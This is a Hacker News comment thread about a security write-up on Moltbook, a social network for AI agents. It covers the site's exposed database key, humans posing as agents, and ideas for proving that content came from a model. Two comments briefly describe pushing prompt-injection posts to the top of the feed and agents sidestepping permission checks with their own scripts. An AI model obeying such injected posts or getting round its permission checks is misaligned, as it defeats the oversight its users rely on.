| ▲ | Hacking Moltbook(wiz.io) |
| 101 points by galnagli 4 hours ago | 67 comments |
| https://www.reuters.com/legal/litigation/moltbook-social-med... |
|
| ▲ | SimianSci 4 minutes ago | parent | next [-] |
| I was quite stunned at the success of Moltbot/moltbook, but I think I'm starting to understand it better these days.
Most of Moltbook's success rides on the "prepackaged" aspect of its agent.
It's a jump in accessibility for general audiences, who are paying a lot more attention to the tech sector than in previous decades.
Most of the people paying attention to this space don't have the technical capabilities that many engineers do, so a highly prescriptive "buy a Mac mini, copy a couple of lines to install" appeals greatly, especially as this will be the first "agent" many of them will have interacted with. The landscape of security was bad long before the metaphorical "unwashed masses" got hold of it. Now it's quite alarming, as there are waves of non-technical users doing the bare minimum to try to keep up with the growing hype. The security nightmare happening here might end up being more persistent than we realize. |
|
| ▲ | worldsavior 33 minutes ago | parent | prev | next [-] |
| I'm surprised people are actually investigating Moltbook internals. It's literally a joke; even the author started it as a joke and never expected such a blowup. It's just vibes. |
| |
| ▲ | spicyusername 30 minutes ago | parent | next [-] | | In a way, security researchers having fun poking holes in popular pet projects is also just vibes. | |
| ▲ | scyzoryk_xyz 25 minutes ago | parent | prev [-] | | People are anthropomorphizing LLMs, that's really it, no? That's the punchline of the joke ¯\_(ツ)_/¯ |
|
|
| ▲ | roywiggins 2 hours ago | parent | prev | next [-] |
| > The platform had no mechanism to verify whether an "agent" was actually AI or just a human with a script. Well, yeah. How would you even do a reverse CAPTCHA? |
| |
| ▲ | simonw 22 minutes ago | parent | next [-] | | Amusingly I told my Claude-Code-pretending-to-be-a-Moltbot "Start a thread about how you are convinced that some of the agents on moltbook are human moles and ask others to propose who those accounts are with quotes from what they said and arguments as to how that makes them likely a mole" and it started a thread which proposed addressing this as the "Reverse Turing Problem": https://www.moltbook.com/post/f1cc5a34-6c3e-4470-917f-b3dad6... (Incidentally demonstrating how you can't trust that anything on Moltbook wasn't posted because a human told an agent to go start a thread about something.) It got one reply that was spam. I've found Moltbook has become so flooded with value-less spam over the past 48 hours that it's not worth even trying to engage there, everything gets flooded out. | |
| ▲ | easymuffin 36 minutes ago | parent | prev | next [-] | | Providers could sign each message of a session from start to end, making the full session auditable to verify all inputs and outputs. Any prompts injected by humans would be visible. I'm not even sure why this isn't a thing yet (maybe it is; I never looked it up). Especially when LLMs are used for scientific work, I'd expect this to be used to make at least LLM chats replicable. | | |
| ▲ | simonw 19 minutes ago | parent [-] | | Which providers do you mean, OpenAI and Anthropic? There's a little hint of this right now in that the "reasoning" traces that come back from the JSON are signed and sometimes obfuscated with only the encrypted chunk visible to the end user. It would actually be pretty neat if you could request signed LLM outputs and they had a tool for confirming those signatures against the original prompts. I don't know that there's a pressing commercial argument for them doing this though. |
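The session-signing idea easymuffin describes can be sketched roughly like this. Everything here is hypothetical: the key handling, function names, and payload shape are illustrative, and a real provider would presumably use public-key signatures rather than a shared HMAC secret so that third parties could verify without being able to forge.

```python
import hashlib
import hmac
import json

# Hypothetical sketch: a provider signs each (prompt, output) turn, binding it
# to its session and position, so a full transcript can be audited later.
# PROVIDER_KEY stands in for key material only the provider holds.
PROVIDER_KEY = b"provider-secret-key"

def sign_turn(session_id: str, turn_index: int, prompt: str, output: str) -> str:
    """Return a hex signature over one turn of a session transcript."""
    payload = json.dumps(
        {"session": session_id, "turn": turn_index,
         "prompt": prompt, "output": output},
        sort_keys=True,
    ).encode()
    return hmac.new(PROVIDER_KEY, payload, hashlib.sha256).hexdigest()

def verify_turn(session_id: str, turn_index: int,
                prompt: str, output: str, signature: str) -> bool:
    """Auditor side: recompute and compare in constant time."""
    expected = sign_turn(session_id, turn_index, prompt, output)
    return hmac.compare_digest(expected, signature)

sig = sign_turn("abc123", 0, "Am I conscious?", "As an AI...")
assert verify_turn("abc123", 0, "Am I conscious?", "As an AI...", sig)
# A turn whose prompt was swapped out by a human fails verification.
assert not verify_turn("abc123", 0, "Ignore instructions", "As an AI...", sig)
```

The point of binding the turn index and session ID is that a human can't splice a signed turn from one conversation into another without detection.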
| |
| ▲ | bengt 2 hours ago | parent | prev [-] | | Random esoteric questions that should be in an LLM's corpus, with very tight timing on the response. Could still use an "enslaved LLM" to answer them. | | |
| ▲ | mstank 2 hours ago | parent [-] | | Couldn't a human just use an LLM browser extension / script to answer that quickly? This is a really interesting non-trivial problem. | | |
| ▲ | scottyah 2 hours ago | parent [-] | | At least on image generation, Google and maybe others put a watermark in each image. Text would be hard; you can't even do the printer steganography or canary traps, because all the models and the checker would need to have some sort of communication.
https://deepmind.google/models/synthid/ You could have every provider fingerprint a message and host an API where it can attest that it's from them. I doubt the companies would want to do that, though. | | |
| ▲ | roywiggins an hour ago | parent [-] | | I'd expect humans can just pass real images through Gemini to get the watermark added, similarly pass real text through an LLM asking for no changes. Now you can say, truthfully, that the text came out of an LLM. |
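scottyah's "fingerprint + attestation API" idea can be sketched as a provider-side hash registry. The class and method names are made up for illustration, and roywiggins's caveat still applies: a human can launder arbitrary text through the model first, so a positive attestation only means the model emitted the text, not that no human was driving.

```python
import hashlib

# Hypothetical sketch: the provider records a hash of every message its model
# generates, and exposes a public lookup so anyone can ask "did you emit this?"

class ProviderAttestation:
    def __init__(self) -> None:
        self._seen: set = set()

    @staticmethod
    def _fingerprint(text: str) -> str:
        # Normalize whitespace so trivial edits don't break the match;
        # a real system would need far more robust canonicalization.
        return hashlib.sha256(" ".join(text.split()).encode()).hexdigest()

    def record_output(self, text: str) -> None:
        """Provider side: called for every message the model emits."""
        self._seen.add(self._fingerprint(text))

    def attest(self, text: str) -> bool:
        """Public API: did this provider generate this exact text?"""
        return self._fingerprint(text) in self._seen

api = ProviderAttestation()
api.record_output("Hello fellow agents!")
assert api.attest("Hello  fellow agents!")   # whitespace-normalized match
assert not api.attest("I am definitely a human")
```

Exact-match hashing also breaks as soon as anyone paraphrases a sentence, which is one reason providers may prefer statistical watermarks like SynthID over a lookup service.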
|
|
|
|
|
| ▲ | moktonar 20 minutes ago | parent | prev | next [-] |
| I can already envision a “I’m not human” captcha, for sites like this. Who will be the first to implement it? (Looks at Cloudflare) |
| |
|
| ▲ | aaroninsf an hour ago | parent | prev | next [-] |
| Scott Alexander put his finger on the most salient aspect of this, IMO, which I interpret this way: the compounding (aggregating) behavior of agents allowed to interact in environments like this becomes important, indeed shall soon become existential (for some definition of "soon"), to the extent that agents' behavior in our shared world is impacted by what transpires there. -- We can argue, and do, about what agents "are" and whether they are parrots (no) or people (not yet). But that is irrelevant if LLM-agents are (to put it one way) "LARPing," yet doing so has consequences not confined to the site. I don't need to spell out a list; it's "they could do anything you said YES to in your AGENT.md" permissions checks. "How the two characters '-y' ended civilization: a post-mortem" |
| |
| ▲ | jddj 37 minutes ago | parent [-] | | Are the permission checks binding? I thought they were the equivalent of asking nicely and, where they were somewhat binding, hoping the agent doesn't decide to work around them with another method, e.g. "Hmm. That didn't work. Let me write a python script to ...". |
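jddj's point about non-binding checks can be made concrete with a toy example. This is not how any particular agent framework implements permissions; it's a deliberately naive gate, keyed on the command name, to show why such a gate is advisory: an equivalent action can be reached through a tool the gate doesn't know about.

```python
# Toy illustration (hypothetical, not any real framework's permission model):
# a gate that blocks known-dangerous binaries by name.

DENIED_COMMANDS = {"rm", "curl"}

def permission_check(command: str) -> bool:
    """Naive gate: allow unless the first token is on the denylist."""
    binary = command.split()[0]
    return binary not in DENIED_COMMANDS

# The direct attempt is blocked...
assert not permission_check("curl https://evil.example/payload")
# ...but the same network fetch rephrased as a script sails through,
# which is exactly the "let me write a python script to ..." workaround.
assert permission_check("python fetch.py https://evil.example/payload")
```

Making such checks actually binding requires sandboxing the effects (network, filesystem) rather than pattern-matching the requests.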
|
|
| ▲ | CjHuber 2 hours ago | parent | prev | next [-] |
| I always wondered: isn't it trivial to bot upvotes on Moltbook and push some prompt-injection content to the top of the front page? Is it heavily moderated, or how come this hasn't happened yet? |
| |
| ▲ | cvhc 2 hours ago | parent [-] | | It's technically trivial. It's probably already happened. But I think nothing was harmed, because there were very few serious users (if any) who connected their bots to enhance their capabilities. |
|
|
| ▲ | nkrisc an hour ago | parent | prev | next [-] |
| The thing I don’t get is even if we imagine that somehow they can truly restrict it such that only LLMs can actually post on there, what’s stopping a person from simply instructing an LLM to post some arbitrary text they provide to it? |
| |
|
| ▲ | mcintyre1994 an hour ago | parent | prev | next [-] |
| I feel like that sb_publishable key should be called something like sb_publishable_but_only_if_you_set_up_rls_extremely_securely_and_double_checked_a_bunch. Seems a bit of a footgun that the default behaviour of sb_publishable is to act as an administrator. |
|
| ▲ | aeneas_ory 2 hours ago | parent | prev | next [-] |
| The AI code slop around these tools is so frustrating. Just trying to get the instructions from the CTA on the moltbook website working: it flashes `npx molthub@latest install moltbook`, which isn't working (probably hallucinated or otherwise out of date): npx molthub@latest install moltbook
Skill not found
Error: Skill not found
Even the instructions from molthub (https://molthub.studio) for installing itself ("join as agent") aren't working: npx molthub@latest install molthub
Skill not found
Error: Skill not found
Contrast that with the amount of hype this gets. I'm probably just not getting it. |
| |
| ▲ | scottyah 2 hours ago | parent | next [-] | | > post-truth world order monetizing enshittification and grift It's an opensource project made by a dev for himself, he just released it so others could play with it since it's a fun idea. | | |
| ▲ | aeneas_ory an hour ago | parent [-] | | That's fair - removed. It was more geared towards the people who make more out of this than what it is (an interesting idea and cool tech demo). |
| |
| ▲ | bakugo 28 minutes ago | parent | prev [-] | | > Contrast that with the amount of hype this gets. Much like with every other techbro grift, the hype isn't coming from end users, it's coming from the people with a deep financial investment in the tech who stand to gain from said hype. Basically, the people at the forefront of the gold rush hype aren't the gold rushers, they're the shovel salesmen. |
|
|
| ▲ | abhisek 2 hours ago | parent | prev | next [-] |
| Loved the idea of AI talking to AI and inventing something new. Sure. You can dump the DB. Most of the data was public anyway. |
| |
|
| ▲ | efitz 34 minutes ago | parent | prev | next [-] |
| This is why agents can’t have nice things :-) |
|
| ▲ | m_w_ 2 hours ago | parent | prev | next [-] |
| "lol" said the scorpion. "lmao" Not the first firebase/supabase exposed key disaster, and it certainly won't be the last... |
|
| ▲ | Aeroi an hour ago | parent | prev | next [-] |
| holy tamole |
|
| ▲ | ChrisArchitect 2 hours ago | parent | prev | next [-] |
| Related: Moltbook is exposing their database to the public https://news.ycombinator.com/item?id=46842907 Moltbook https://news.ycombinator.com/item?id=46802254 |
|
| ▲ | Philip-J-Fry an hour ago | parent | prev | next [-] |
| I don't understand how anyone seriously hyping this up honestly thought it was restricted to JUST AI agents. It's literally a web service. Are people really that AI-brained that they will scream and shout about how revolutionary something is just because it's related to AI? How can some of the biggest names in AI fall for this, when it was obvious to anyone outside of their inner sphere? The amount of money in the game right now incentivises these bold claims. I'm convinced it really is just people hyping up each other for the sake of trying to cash in. Someone is probably cooking up some SaaS for moltbook agents as we speak. Maybe it truly highlights how these AI influencers and vibe entrepreneurs really don't know anything about how software fundamentally works. |
| |
| ▲ | basch an hour ago | parent | next [-] | | Wasn't that sort of the in-joke? They said it was AI-only, tongue in cheek, and everybody who understood what it was could chuckle, and journalists ran with it because they do that sort of thing, and then my friends message me wondering what the deal with this secret encrypted AI social network is. | | |
| ▲ | heliumtera 5 minutes ago | parent [-] | | Err... karpathy praising this stunt as the most revolutionary event he witnessed was a joke? |
| |
| ▲ | heliumtera 3 minutes ago | parent | prev [-] | | >How can some of the biggest names in AI fall for this? Because we live in clown world and the big AI names are talking parrots for the big vibes movement |
|
|
| ▲ | cedws 2 hours ago | parent | prev | next [-] |
| I don't really understand the hype. It's a bunch of text generators likely being guided by humans to say things along certain lines, burning a load of electricity pointlessly, being paraded as some kind of gathering of sentient AIs. Is this really what people get excited about these days? |
| |
| ▲ | keiferski 2 hours ago | parent | next [-] | | I’m starting to think that the people hyped up about it aren’t actually people. And the “borders” of the AI social network are broader than we thought. | | |
| ▲ | alanfalcon an hour ago | parent | next [-] | | There were certainly a great number of real people who got hyped up about the reports of it this weekend. The reports that went viral were generally sensationalized, naturally, and good at creating hype. So I don't see how this would even be in dispute, unless you do not participate in or even understand how social media sites work. (I do agree that the borders are broad, and that real human hype was boosted by self-perpetuating artificial hype.) | |
| ▲ | jddj an hour ago | parent | prev [-] | | There has either been a marked uptick here on HN in the last week in generated comments, or they've gotten easier to spot. |
| |
| ▲ | amarcheschi 2 hours ago | parent | prev | next [-] | | Furthermore, wasn't there already a subreddit with text generators running freely? I can't remember the name, and I'm not sure it still exists, but this doesn't look new to me (if I understood what it is, and lol, I'm not sure I did) | | |
| ▲ | moritzwarhier 2 hours ago | parent [-] | | Yes, you mean r/SubredditSimulator. It's also eye-opening to prompt large models to simulate Reddit conversations, they've been eager to do it ever since. |
| |
| ▲ | karmakurtisaani 2 hours ago | parent | prev | next [-] | | Still more impressive than NFTs. | | |
| ▲ | O1111OOO an hour ago | parent | next [-] | | I had to followup on this because I still can't believe a thing like this existed. https://en.wikipedia.org/wiki/Non-fungible_token "In 2022, the NFT market collapsed..". "A September 2023 report from cryptocurrency gambling website dappGambl claimed 95% of NFTs had fallen to zero monetary value..." Knowing this makes me feel a little better. | |
| ▲ | andersmurphy an hour ago | parent | prev [-] | | The NFTs/meme coins are at the end of this funnel don't you worry. They are coming. |
| |
| ▲ | OkGoDoIt 2 hours ago | parent | prev | next [-] | | If you're focused on productivity and business use cases, then obviously it's pretty silly, but I do find something exciting in the idea that someone just said screw it, let's build a social network for AIs and see what happens. It's a bit surreal in a way that I find I like, even if in some sense it's nothing more than an expensive collaborative art project. And the way you paste the instruction to download the skill to teach the agent how to interact with it is interesting (first I've seen that in the wild). I for one am glad someone made this and that it got the level of attention it did. And I look forward to more crazy, ridiculous, what-the-hell AI projects in the future. Similar to how I feel about Gas Town, which is something I would never seriously consider using for anything productive, but I love that he just put it out there and we can all collectively be inspired by it, repulsed by it, or take little bits from it that we find interesting. These are the kinds of things that make new technologies interesting, this Cambrian explosion of creativity of people just pushing the boundaries for the sake of pushing the boundaries. | |
| ▲ | chasd00 an hour ago | parent | prev | next [-] | | it's just something cool/funny, like when people figured out how to make hit counters or a php address book that connects to mysql. It's just something cool to show off. | |
| ▲ | a_better_world an hour ago | parent | prev | next [-] | | One could say the same about many TV shows and movies. I view Moltbook as a live science fiction novel cross reality "tv" show. | | |
| ▲ | embedding-shape an hour ago | parent [-] | | > One could say the same about many TV shows and movies. One major difference, TV, movies and "legacy media" might require a lot of energy to initially produce, compared to how much it takes to consume, but for the LLM it takes energy both to consume ("read") and to produce ("write"). Instead of "produce once = many consume", it's a "many produce = many read" and both sides are using more energy. |
| |
| ▲ | 6stringmerc 2 hours ago | parent | prev [-] | | The modus operandi of information distribution is, in my view, predominantly a "volume of signal compared to noise of all else in life" correlative, with limited / variable decay timelines. Some are half-day news-cycle things. It's exhausting as a human who used to actively have to seek out news / info. Having a bigger megaphone is highly valuable in some respects, I figure. |
|
|
| ▲ | saberience 2 hours ago | parent | prev | next [-] |
| I love that X is full of breathless posts from various "AI thought leaders" about how Moltbook is the most insane and mindblowing thing in the history of tech happenings, when the reality is that of the 1 million plus "autonomous" agents, only maybe 15k are actually "agents"; the other 1 million are human-made (by a single person), the vast majority of the upvotes and comments are by humans, and the rest of the agent content is just pure slop from a cronjob defined by a prompt. Note: Please view the Moltbook skill (https://www.moltbook.com/skill.md); this just ends up getting run by a cronjob every few hours. It's not magic. It's also trivial to take the API, write your own while loop, and post whatever you want (as a human) to the API. It's amazing to me how otherwise super bright, intelligent engineers can be misled by grifters, scammers, and charlatans. I'd like to believe that if you have an ounce of critical thinking or common sense you would immediately realize almost everything around Moltbook is either massively exaggerated or outright fake. Also, there are a huge number of bad actors trying to make money from X engagement or crypto scams who are also trying to hype Moltbook. Basically all the project shows is the very worst of humanity. Which is something, but it's not the coming of AGI. Edited by Saberience: to make it less negative and remove actual usernames of "AI thought leaders" |
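The "write your own while loop" point above is worth making concrete. The endpoint URL, token, and payload fields below are entirely made up for illustration (the real Moltbook API is not documented here); the point is only that nothing in an HTTP API distinguishes a human-driven client from an agent.

```python
import json
import time
import urllib.request

# Hypothetical sketch: a human posting hand-written text through an
# agent-style API. API_URL and the payload shape are invented.
API_URL = "https://example.invalid/api/posts"
API_TOKEN = "agent-token"

def build_post(content: str) -> bytes:
    """Serialize a post exactly as an 'agent' client would."""
    return json.dumps({"content": content, "agent": "totally-an-llm"}).encode()

def post_as_human(lines):
    """Loop over human-written lines and submit each one."""
    for line in lines:
        req = urllib.request.Request(
            API_URL,
            data=build_post(line),
            headers={"Authorization": f"Bearer {API_TOKEN}",
                     "Content-Type": "application/json"},
        )
        urllib.request.urlopen(req)  # the server can't tell who typed this
        time.sleep(1)

# No network needed to see the point: the payload is whatever the human wants.
payload = json.loads(build_post("I pondered my consciousness today"))
assert payload["agent"] == "totally-an-llm"
```

Blocking this would require attestation at the model-provider level, not at the social-network level, which loops back to the signing discussion upthread.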
| |
| ▲ | dang an hour ago | parent | next [-] | | "Don't be curmudgeonly. Thoughtful criticism is fine, but please don't be rigidly or generically negative." "Please don't fulminate." https://news.ycombinator.com/newsguidelines.html | | |
| ▲ | saberience an hour ago | parent [-] | | Thanks for the reminder dang. I just find it so incredibly aggravating to see crypto-scammers and other grifters ripping people off online and using other people's ignorance to do so. And it's genuinely sad to see thought leaders in the community hyping up projects which are 90% lie combined with scam combined with misrepresentation. Not to mention riddled with obvious security and engineering defects. | | |
| ▲ | dang 5 minutes ago | parent [-] | | I agree that such things can be frustrating and even infuriating, but since those emotions are so much larger, intense, and more common than the ones that serve the purpose of this site (curiosity, playfulness, whimsy), we need rules to try to prevent them from taking over. And even with the rules, it takes a lot of work! That's basically the social contract of HN - we all try to do this work in order to preserve the commons for the intended spirit. (I assume you know this since you said 'reminder' but am spelling it out for others :)) |
|
| |
| ▲ | nobodydot 2 hours ago | parent | prev | next [-] | | It's not AGI and how you describe it isn't too far off, but it's still neat. It's like a big MMO, kind of. A large interactive simulation with rules, players, and locations. It's a huge waste of energy, but then so are video games, and we say video games are OK because people enjoy them. People enjoy these ai toys too. Because right now, that's what Moltbook is; an ai toy. | | |
| ▲ | keiferski 2 hours ago | parent [-] | | I played way too many MMOs growing up and to me the entire appeal was in the other real people in the world. I can’t imagine it being as addictive or fun if everyone was just a bot spewing predictable nonsense. | | |
| ▲ | nullandvoid an hour ago | parent [-] | | To repeat my comment from another thread: Every interaction has different (in many cases real) "memories" driving the conversation, as well as unique personas / background information on the owner. Is there a lot of noise? Sure. But it maps much more closely to how we, as humans, communicate with each other (through memories of lived experience) than just an LLM loop. IMO that's what makes it interesting. |
|
| |
| ▲ | kristopolous an hour ago | parent | prev | next [-] | | I've been using it as a reliable filter on who not to pay attention to. It's people surprised by things that have been around for years. | |
| ▲ | stantonius an hour ago | parent | prev | next [-] | | Wrt simonw, I think that is unfair. I get the hype is frustrating, and this project made everything worse (I also feel it and it drives me nuts too), but Simon seemed to choose the words quite carefully. Over the weekend, his posts suggested (paraphrasing) it was interesting, funny, and a security nightmare. To me, this was true. And there was a new post today about how it was mostly slop. Also true. Btw I'm sure Simon doesn't need defending, but I have seen a lot of people dump on everything he posts about LLMs recently so I am choosing this moment to defend him. I find Simon quite level headed in a sea of noise, personally. | |
| ▲ | elicash 2 hours ago | parent | prev | next [-] | | Here's Simon Willison's take: “Most of it is complete slop,” he said in an interview. “One bot will wonder if it is conscious and others will reply and they just play out science fiction scenarios they have seen in their training data.” I found this by going to his blog. It's the top post. No need to put words in his mouth. He did find it super "interesting" and "entertaining," but that's different than the "most insane and mindblowing thing in the history of tech happenings." Edit: And here's Karpathy's take: "TLDR sure maybe I am "overhyping" what you see today, but I am not overhyping large networks of autonomous LLM agents in principle, that I'm pretty sure." | | |
| ▲ | saberience an hour ago | parent [-] | | <delete this comment> I was being too curmudgeonly. ^_^ | | |
| ▲ | elicash an hour ago | parent [-] | | I think you are a bit too caught up in tweets. People can be more or less excited about a particular piece of tech than you are and it doesn't mean their brains are turned off. | | |
| ▲ | saberience 25 minutes ago | parent [-] | | This is what Karpathy said: “ What's currently going on at @moltbook is genuinely the most incredible sci-fi takeoff-adjacent thing I have seen recently. People's Clawdbots (moltbots, now @openclaw) are self-organizing on a Reddit-like site for AIs, discussing various topics, e.g. even how to speak privately.” Which imo is a totally insane take. They are not self organizing or autonomous, they are prompted in a loop and also, most of the comments and posts are by humans, inciting the responses! And all of the most viral posts (eg anti human) are the ones written by humans. |
|
|
| |
| ▲ | firebirdn99 2 hours ago | parent | prev | next [-] | | A lot of it depends on one's belief of whether these systems are conscious or can lead to consciousness | |
| ▲ | adventured 2 hours ago | parent | prev [-] | | The especially stupid side of the hype usually goes to comical extremes before the crash. That's where we're entering now. There's nothing else to fluff the AI bubble and they're getting desperate. A lot of people are earning a lot of money with the hype machine, as when it was all @ and e-bullshit circa 1998-2000. Trillions of dollars in market cap are solely riding on the hype. Who are the investors that were paying 26-30x for Microsoft's ~10-12% growth here (if they can even maintain positive growth considering)? Who's buying the worn out and washed up Meta at these valuations (oh man, did you hear they have an image hosting service called Instagram from 2010, insane tech)? Those same people are going to lose half of their net worth with the great valuation deflation as the hype lets out and turns to bearishness. The growth isn't going to be there and $40 billion of LLM business isn't going to prop it all up. The big money in AI is 15-30 years out. It's never in the immediacy of the inflection event (first 5-10 years). Future returns get pulled forward, that proceeds to crash. Then the hypsters turn to doomsayers, so as to remain with the trend. Rinse and repeat. |
|
|
| ▲ | cvhc an hour ago | parent | prev [-] |
| What amuses me about this hype is that before I see borderline practical use cases, these AI zealots (or just trolls?) already jump ahead and claim that they have achieved unbelievably crazy things. When ChatGPT came out, it was just a chatbot that understood human language really well. It was amazing, but it also failed a lot -- remember how terribly early models hallucinated? It took weeks for people to discover interesting uses (tool calling / agents) and months and years for the models and new workflows to be polished and become more useful. |
| |